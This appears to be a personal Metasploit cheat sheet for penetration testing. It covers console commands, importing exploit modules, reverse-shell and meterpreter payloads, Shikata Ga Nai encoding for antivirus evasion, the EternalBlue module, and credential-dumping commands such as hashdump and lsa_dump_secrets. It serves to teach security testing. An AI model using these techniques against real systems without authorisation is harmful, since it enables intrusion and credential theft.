Metasploit
yup, this who page is just for it :3
msfconsole
to start it
search exploit <term>
Searches for the term in the exploits
use <exploit_path>
Selects the exploit to use (or use the number after a search)
show options
Shows the selected exploit's options
set <variable> <value>
Sets the option's value
check
Checks if the server is vulnerable
exploit
Runs the exploit
Useful exploits
multi/handler
to catch shells from msfvenomwindows/smb/ms17_010_psexec
EternalBlue (scan withauxiliary/scanner/smb/smb_ms17_010
)post/multi/recon/local_exploit_suggester
After successful shell, suggests possible exploitsmulti/manage/shell_to_meterpreter
Upgrade generic shell to meterpreter, more here
Adding exploits to msfconsole
For example, find it from searchsploit
:
searchsploit Lightweight Facebook-styled blog 1.3
the script has a metasploit module but it's not included by default so we have to import it
cd /usr/share/metasploit-framework/modules/exploits
# optionally mkdir php
searchsploit -m php/webapps/50064.rb
msfconsole -m /usr/share/metasploit-framework/modules/
# OR from metasploit
msf6> loadpath /usr/share/metasploit-framework/modules/
# OR
msf6> reload_all
The critical folders are also symlinked in our home and root folders in the hidden ~/.msf4/
location.
To write a custom script all necessary information about Metasploit Ruby coding can be found on the Rubydoc.info Metasploit Framework related page.
Search
help search
search type:exploit platform:windows cve:2021 rank:excellent microsoft
GREP
grep meterpreter show payloads
grep meterpreter grep reverse_tcp show payloads
Payload Types
The table below contains the most common payloads used for Windows machines and their respective descriptions.
Payload
Description
generic/custom
Generic listener, multi-use
generic/shell_bind_tcp
Generic listener, multi-use, normal shell, TCP connection binding
generic/shell_reverse_tcp
Generic listener, multi-use, normal shell, reverse TCP connection
windows/x64/exec
Executes an arbitrary command (Windows x64)
windows/x64/loadlibrary
Loads an arbitrary x64 library path
windows/x64/messagebox
Spawns a dialog via MessageBox using a customizable title, text & icon
windows/x64/shell_reverse_tcp
Normal shell, single payload, reverse TCP connection
windows/x64/shell/reverse_tcp
Normal shell, stager + stage, reverse TCP connection
windows/x64/shell/bind_ipv6_tcp
Normal shell, stager + stage, IPv6 Bind TCP stager
windows/x64/meterpreter/$
Meterpreter payload + varieties above
windows/x64/powershell/$
Interactive PowerShell sessions + varieties above
windows/x64/vncinject/$
VNC Server (Reflective Injection) + varieties above
Encoders
Shikata Ga Nai (SGN
) is one of the most utilized Encoding schemes today because it is so hard to detect that payloads encoded through its mechanism are not universally undetectable anymore. Far from it. The name (仕方がない
) means It cannot be helped
or Nothing can be done about it
, and rightfully so if we were reading this a few years ago. However, there are other methodologies we will explore to evade protection systems. This article from FireEye details the why and the how of Shikata Ga Nai's previous rule over the other encoders.
Flags to add encoding for msfvenom
-b "\x00" -e x86/shikata_ga_nai
-b
for bad bytes-e
encoding
For msfconsole
:
show encoders
If we were to encode an executable payload only once with SGN, it would most likely be detected by most antiviruses today. Let's delve into that for a moment.
Iterating encoders: -i 10
Databases
Metasploit supports PostgreSQL by default.
Check status:
sudo msfdb status
Configure if not already present:
sudo service postgresql status
sudo systemctl start postgresql
sudo msfdb init
Workspaces
workspace -a Target_1
workspace Target_1
workspace
workspace -h
Importing nmap scans
You can import XML (preferably) nmap outputs:
db_import Target.xml
Or scan directly from inside msfconsole:
db_nmap -sV -sS 10.10.10.8
See saved target hosts:
hosts
See discovered services:
services
Save Found Credentials
creds -h
Backup data
After finishing the session, make sure to back up our data if anything happens with the PostgreSQL service. To do so, use the db_export
command.
db_export -f xml backup.xml
Loot
The loot
command works in conjunction with the command above to offer you an at-a-glance list of owned services and users. The loot, in this case, refers to hash dumps from different system types, namely hashes, passwd, shadow, and more.
loot -h
Plugins
Listed in /usr/share/metasploit-framework/plugins
Loading plugins (example with nessus):
load nessus
nessus_help
Installing new plugins
git clone https://github.com/darkoperator/Metasploit-Plugins
sudo cp ./Metasploit-Plugins/pentest.rb /usr/share/metasploit-framework/plugins/pentest.rb
Afterward, launch msfconsole
and check the plugin's installation by running the load
command. After the plugin has been loaded, the help menu
at the msfconsole
is automatically extended by additional functions.
Some plugins
Many people write many different plugins for the Metasploit framework. They all have a specific purpose and can be an excellent help to save time after familiarizing ourselves with them. Check out the list of popular plugins below:
Sessions
To change out of the current meterpreter (or other stages) session use:
background
List with:
sessions
Switch to session ID with:
sessions -i <Number>
post
modules often require to specify a session in the options
Jobs
If, for example, we are running an active exploit under a specific port and need this port for a different module, we cannot simply terminate the session using [CTRL] + [C]
. If we did that, we would see that the port would still be in use, affecting our use of the new module. So instead, we would need to use the jobs
command to look at the currently active tasks running in the background and terminate the old ones to free up the port.
jobs -h
When we run an exploit, we can run it as a job by typing exploit -j
. Per the help menu for the exploit
command, adding -j
to our command. Instead of just exploit
or run
, will "run it in the context of a job."
exploit -h
Listing running jobs:
jobs -l
Use the jobs -K
command to kill all running jobs. or kill [index no.]
to kill a specific one
Useful meterpreter commands
hashdump
lsa_dump_sam
lsa_dump_secrets
Last updated